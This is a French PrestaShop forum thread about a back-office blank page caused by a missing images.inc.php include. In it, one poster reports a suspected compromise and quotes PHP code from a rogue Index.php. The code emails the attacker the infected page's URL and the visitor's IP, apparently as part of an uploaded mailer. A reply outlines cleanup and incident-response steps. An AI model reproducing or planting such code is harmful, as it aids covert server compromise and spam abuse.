Jump to content

Accès admin impossible / Page blanche !


Recommended Posts

Bonjour à tous,

 

Sous prestashop depuis 2 ans, notre partie front office fonctionne

sans problème, par contre la partie back office, accès admin ne

fonctionne pas, une page toute blanche, alors que ça

fonctionnait très bien depuis deux ans ! Nous n'avons rien touché,

même pas les fichiers sur le FTP...

 

Du coup accès admin impossible, retard dans les commandes, etc,

je vous laisse deviner... avez-vous une idée ?

 

Merci beaucoup.

Link to comment
Share on other sites

Activez l'affichage des erreurs pour en savoir plus, en modifiant cette ligne au début du fichier config/defines.inc.php :

 

define('_PS_MODE_DEV_', false);

 

par

 

define('_PS_MODE_DEV_', true);

 

Et donnez-nous l'erreur après avoir rafraichi la page

Link to comment
Share on other sites

Super merci !

 

Voici l'erreur :

 

Warning: require_once(/home/XXXX/www/admin0/../images.inc.php): failed to open stream: No such file or directory in /home/XXXX/www/admin0/functions.php on line 29

Fatal error: require_once(): Failed opening required '/home/XXXX/www/admin0/../images.inc.php' (include_path='/home/XXXX/www/tools/htmlpurifier/standalone:.:/usr/local/php5.4/lib/php') in /home/XXXX/www/admin0/functions.php on line 29

Link to comment
Share on other sites

  • 1 year later...

Voici le message d'erreur obtenu uniquement sur le backoffice:

 


Warning: require_once(/home/***/www/boutique/admin546frgydm/../images.inc.php): failed to open stream: No such file or directory in /home/***/www/boutique/admin546frgydm/functions.php on line 29

Fatal error: require_once(): Failed opening required '/home/***/www/boutique/admin546frgydm/../images.inc.php' (include_path='/home/***/www/boutique/tools/htmlpurifier/standalone:.:/usr/local/php5.6/lib/php') in /home/***/www/boutique/admin546frgydm/functions.php on line 29

 

Pour info, je pense avoir été piraté car je retrouve sur la racine du serveur un fichier Index.php en supplément du index.php d'origine contenant un grande code dedans et avec le script suivant à la fin:

<?php $ip = getenv("REMOTE_ADDR");
/// Coded By Noureddine ElmGhreBi
/// Contact Me : https://www.facebook.com/Noureddine.Boumadyen?_rdr=p
/// More Toturials Visite : http://nourblog.blogspot.com/
$hostname = gethostbyaddr($ip);
$bilsmg = "Link Mailer : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$bilsnd ="[email protected]"; ///Your E4ail Here
$bilsub = "New Mailer Uploaded By Www.NourBlog1.BogSpot.Com !! $ip";
$bilhead = "From: MaileRyew";
$bilhead .= $_POST['eMailAdd']."\n";
$bilhead .= "MIME-Version: 1.0\n";
$arr=array($bilsnd, $IP);
foreach ($arr as $bilsnd)
mail($bilsnd,$bilsub,$bilsmg,$bilhead,$message); ?>

 

Le fichier a été fait à 00h30 cette nuit donc personne n'était censé être connecté dans la nuit.

 

Si quelqu'un peut m'apporter de l'aide se serait super.

Bien cordialement, Yoan.

Link to comment
Share on other sites

Il n'y a pas de méthode simple.

Il faut couper votre site du web (pas maintenance, vraiment coupé donc renommage du répertoire www par exemple)

Ensuite une analyse en profondeur des 40 000 fichiers prestashop.

- Eplucher les logs et les requêtes en POST

- Controler ceux qui ont été modifiés

- Remettre ceux qui manquent

- Supprimer ceux qui ont été ajoutés- Trouver la porte d'entrée (souvent un module ou un WP pas à jour) et la corriger/supprimer

De quoi vous occuper le weekend...

  • Like 2
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...